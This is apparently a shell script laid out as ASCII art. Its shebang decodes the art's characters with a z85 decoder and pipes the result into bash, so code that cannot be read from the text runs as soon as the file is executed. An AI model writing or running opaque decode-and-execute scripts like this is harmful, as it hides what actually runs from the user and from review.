#!/usr/bin/env -S bash -c 'tail -n+2 "$1" | tr -d " \n" | z85m -d | bash' --

                              v%
                              8*
                              da
                              t4
                              TS
                eLEp2BAzFyiXJdbvrTtpx([3
                               hv
                               S=
                               :6
                               A
                              :%
                              39
                              B
     y/uie[n*pfkCctz/YGgwO#6jA+P30A=k=gA:{+tvrlK4AXz
                             DK
                             y?
                             $
            .BxDRWBvQ       Ts              >3t1D@Bp7M+kWFd:d
        mWU(c     p8lPza    v/         RevV0k             2lOVg
      FSm              mi5t Rg     x)Kap                     h+
    LDR                  ^KHo.  i:j^                         3C
  5hp                      #sXS1xB                          z$
 V1m                       O^rm                           B67
 sO                     Bxg<Y f*6                        .O
 D                 2DXvpiX     lOrB                   [xHj
VCnRr    ZZ4XBT6[cl[f             /$v}O!3tq       XM1n]
  v3=buV^5d@E                           W/3iHwj3
